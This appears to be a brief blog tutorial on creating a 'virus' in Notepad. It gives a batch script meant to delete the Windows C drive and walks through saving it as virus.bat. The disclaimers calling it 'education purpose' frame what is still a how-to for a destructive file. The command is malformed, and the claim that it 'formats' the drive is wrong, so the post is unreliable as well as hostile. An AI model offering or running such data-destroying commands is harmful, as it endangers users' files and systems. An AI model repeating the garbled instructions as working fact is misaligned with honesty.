Many of you will think the methods to create a computer virus involves complex coding, but it is nothing like that. In this post, we will check out a method that is based on Notepad.
Warning
Note: This method is only for education purpose. Don’t try this on your computer, as it will completely format your C drive.
Steps to Create the Virus (Script)
Step 1: First of all, in your Windows OS, open Notepad.
Step 2: Now, copy and paste the below code into your notepad screen.
@Echo off
Del C: . |y
Step 3: Now save this file as virus.bat (you can select any random name, but .bat after that must be there).
Step 4: Now running the file will delete the C drive completely, and the operating system of the respective computer will get corrupted.
That’s it.
Note: This method is only for knowledge purposes. Don’t try this on your computer, as it will completely format your C drive.